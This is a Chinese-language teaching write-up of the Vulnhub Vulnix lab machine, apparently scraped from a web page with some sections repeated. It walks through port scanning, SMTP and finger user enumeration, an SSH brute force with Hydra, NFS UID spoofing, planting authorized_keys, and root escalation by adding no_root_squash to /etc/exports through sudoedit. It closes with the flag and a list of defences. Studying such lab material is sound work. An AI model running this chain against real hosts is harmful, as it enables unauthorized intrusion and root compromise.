Vulnhub Vulnix 靶机渗透测试教学文档<\/h1>

1. 靶机信息<\/h2>

靶机名称: Vulnix<\/li>
IP地址: 192.168.8.103<\/li>
操作系统: Ubuntu Linux (基于OpenSSH版本信息判断)<\/li>

难度等级: 中等<\/li> <\/ul>

2. 初始信息收集<\/h2>

2.1 端口扫描<\/h3>

使用Nmap进行全端口扫描:<\/p>

nmap -p- 192.168.8.103 -sV -sC --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>扫描结果:<\/p>
PORT      STATE SERVICE     VERSION
22\/tcp    open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1
25\/tcp    open  smtp        Postfix smtpd
79\/tcp    open  finger      Linux fingerd
110\/tcp   open  pop3        Dovecot pop3d
111\/tcp   open  rpcbind     2-4 (RPC #100000)
143\/tcp   open  imap        Dovecot imapd
512\/tcp   open  exec?
513\/tcp   open  login?
514\/tcp   open  tcpwrapped
993\/tcp   open  ssl\/imap    Dovecot imapd
995\/tcp   open  ssl\/pop3    Dovecot pop3d
2049\/tcp  open  nfs         2-4 (RPC #100003)
37522\/tcp open  nlockmgr    1-4 (RPC #100021)
42172\/tcp open  mountd      1-3 (RPC #100005)
43219\/tcp open  mountd      1-3 (RPC #100005)
47279\/tcp open  mountd      1-3 (RPC #100005)
54227\/tcp open  status      1 (RPC #100024)
<\/code><\/pre>
2.2 服务分析<\/h3>
重点关注服务:<\/p>

SSH (22\/tcp)<\/strong>: 可能通过暴力破解或密钥方式利用<\/li>
SMTP (25\/tcp)<\/strong>: 可用于枚举用户<\/li>
Finger (79\/tcp)<\/strong>: 可用于获取用户信息<\/li>
NFS (2049\/tcp)<\/strong>: 可能存在共享目录可挂载<\/li>
RPC相关服务<\/strong>: 提供NFS服务信息<\/li>
<\/ol>
3. 用户枚举<\/h2>
3.1 SMTP用户枚举<\/h3>
使用Hydra进行SMTP用户枚举:<\/p>
hydra -L \/usr\/share\/seclists\/Usernames\/Names\/names.txt -s 25<\/span> 192.168.8.103 smtp-enum
<\/span><\/span><\/code><\/pre>发现有效用户:<\/p>
bin irc mail nab root sys user
<\/code><\/pre>
3.2 Finger服务利用<\/h3>
使用finger命令验证用户:<\/p>
xargs -a username -I {}<\/span> finger {}<\/span>@192.168.8.103
<\/span><\/span><\/code><\/pre>结果分析:<\/p>

user<\/code>用户存在，使用\/bin\/bash<\/code>作为shell<\/li>
其他用户大多使用\/bin\/sh<\/code>或\/bin\/false<\/code><\/li>
<\/ul>
4. SSH暴力破解<\/h2>
针对user<\/code>用户进行SSH暴力破解:<\/p>
hydra -l user -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/192.168.8.103
<\/span><\/span><\/code><\/pre>成功获取凭证:<\/p>
[22][ssh] host: 192.168.8.103 login: user password: letmein
<\/code><\/pre>
5. 权限提升路径1: NFS挂载<\/h2>
5.1 检查NFS共享<\/h3>
showmount --exports 192.168.8.103
<\/span><\/span><\/code><\/pre>输出:<\/p>
\/home\/vulnix *
<\/code><\/pre>
5.2 本地准备<\/h3>

创建挂载点:<\/li>
<\/ol>
sudo mkdir \/mnt\/vulnix
<\/span><\/span><\/code><\/pre>
创建匹配用户(UID必须匹配):<\/li>
<\/ol>
sudo adduser -u 2008<\/span> vulnix
<\/span><\/span><\/code><\/pre>设置密码: 123<\/p>
5.3 挂载远程目录<\/h3>
sudo mount 192.168.8.103:\/home\/vulnix \/mnt\/vulnix -o vers=<\/span>3<\/span>
<\/span><\/span><\/code><\/pre>5.4 设置SSH免密登录<\/h3>

切换到vulnix用户:<\/li>
<\/ol>
su vulnix
<\/span><\/span><\/code><\/pre>
生成SSH密钥:<\/li>
<\/ol>
mkdir \/mnt\/vulnix\/.ssh
<\/span><\/span>ssh-keygen -t ssh-rsa
<\/span><\/span><\/code><\/pre>
复制公钥到目标:<\/li>
<\/ol>
cp ~\/.ssh\/id_rsa.pub \/mnt\/vulnix\/.ssh\/authorized_keys
<\/span><\/span><\/code><\/pre>5.5 通过SSH登录<\/h3>
ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa'<\/span> -i ~\/.ssh\/id_rsa vulnix@192.168.8.103
<\/span><\/span><\/code><\/pre>6. 权限提升路径2: Root权限获取<\/h2>
6.1 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>发现可以使用sudoedit<\/code>编辑\/etc\/exports<\/code>文件<\/p>
6.2 修改NFS配置<\/h3>

编辑\/etc\/exports:<\/li>
<\/ol>
sudoedit \/etc\/exports
<\/span><\/span><\/code><\/pre>添加:<\/p>
\/root *(rw,no_root_squash)
<\/code><\/pre>
no_root_squash<\/code>选项允许远程root用户保持root权限<\/p>

重启服务使配置生效<\/li>
<\/ol>
6.3 挂载root目录<\/h3>

检查新的共享:<\/li>
<\/ol>
showmount -e 192.168.8.103
<\/span><\/span><\/code><\/pre>
创建挂载点:<\/li>
<\/ol>
sudo mkdir \/mnt\/vulnroot
<\/span><\/span><\/code><\/pre>
挂载root目录:<\/li>
<\/ol>
sudo mount 192.168.8.103:\/root \/mnt\/vulnroot -o vers=<\/span>3<\/span>
<\/span><\/span><\/code><\/pre>6.4 获取root访问<\/h3>

生成root SSH密钥:<\/li>
<\/ol>
sudo ssh-keygen -t ssh-rsa
<\/span><\/span><\/code><\/pre>
设置SSH免密登录:<\/li>
<\/ol>
sudo mkdir \/mnt\/vulnroot\/.ssh
<\/span><\/span>sudo cp \/root\/.ssh\/id_rsa.pub \/mnt\/vulnroot\/.ssh\/authorized_keys
<\/span><\/span><\/code><\/pre>
通过SSH以root身份登录:<\/li>
<\/ol>
sudo ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa'<\/span> -i \/root\/.ssh\/id_rsa root@192.168.8.103
<\/span><\/span><\/code><\/pre>7. 获取Flag<\/h2>
在root目录下找到trophy.txt:<\/p>
cat \/mnt\/vulnroot\/trophy.txt
<\/span><\/span><\/code><\/pre>内容:<\/p>
cc614640424f5bd60ce5d5264899c3be
<\/code><\/pre>
8. 关键知识点总结<\/h2>

服务枚举<\/strong>: 全面的端口扫描和服务识别是渗透测试的基础<\/li>
用户枚举<\/strong>: 通过SMTP和Finger服务获取有效用户列表<\/li>
暴力破解<\/strong>: 针对弱密码进行SSH暴力破解<\/li>
NFS利用<\/strong>:

检查可挂载共享目录<\/li>
创建匹配UID的本地用户<\/li>
挂载远程目录<\/li>
通过SSH密钥实现权限提升<\/li>
<\/ul>
<\/li>
权限提升<\/strong>:

利用sudoedit修改关键配置文件<\/li>
通过NFS的no_root_squash选项获取root权限<\/li>
挂载root目录并设置SSH免密登录<\/li>
<\/ul>
<\/li>
<\/ol>
9. 防御建议<\/h2>

禁用不必要的服务(Finger, NFS等)<\/li>
使用强密码策略<\/li>
限制sudo权限<\/li>
对NFS共享设置严格权限控制<\/li>
避免使用no_root_squash选项<\/li>
定期更新系统和软件<\/li>
<\/ol>

Vulnhub Vulnix 靶机渗透测试教学文档<\/h1>

2. 初始信息收集<\/h2>

3. 用户枚举<\/h2>

5. 权限提升路径1: NFS挂载<\/h2>

6. 权限提升路径2: Root权限获取<\/h2>

9. 防御建议<\/h2> 禁用不必要的服务(Finger, NFS等)<\/li> 使用强密码策略<\/li> 限制sudo权限<\/li> 对NFS共享设置严格权限控制<\/li> 避免使用no_root_squash选项<\/li> 定期更新系统和软件<\/li> <\/ol>

9. 防御建议<\/h2>

禁用不必要的服务(Finger, NFS等)<\/li>
使用强密码策略<\/li>
限制sudo权限<\/li>
对NFS共享设置严格权限控制<\/li>
避免使用no_root_squash选项<\/li>
定期更新系统和软件<\/li> <\/ol>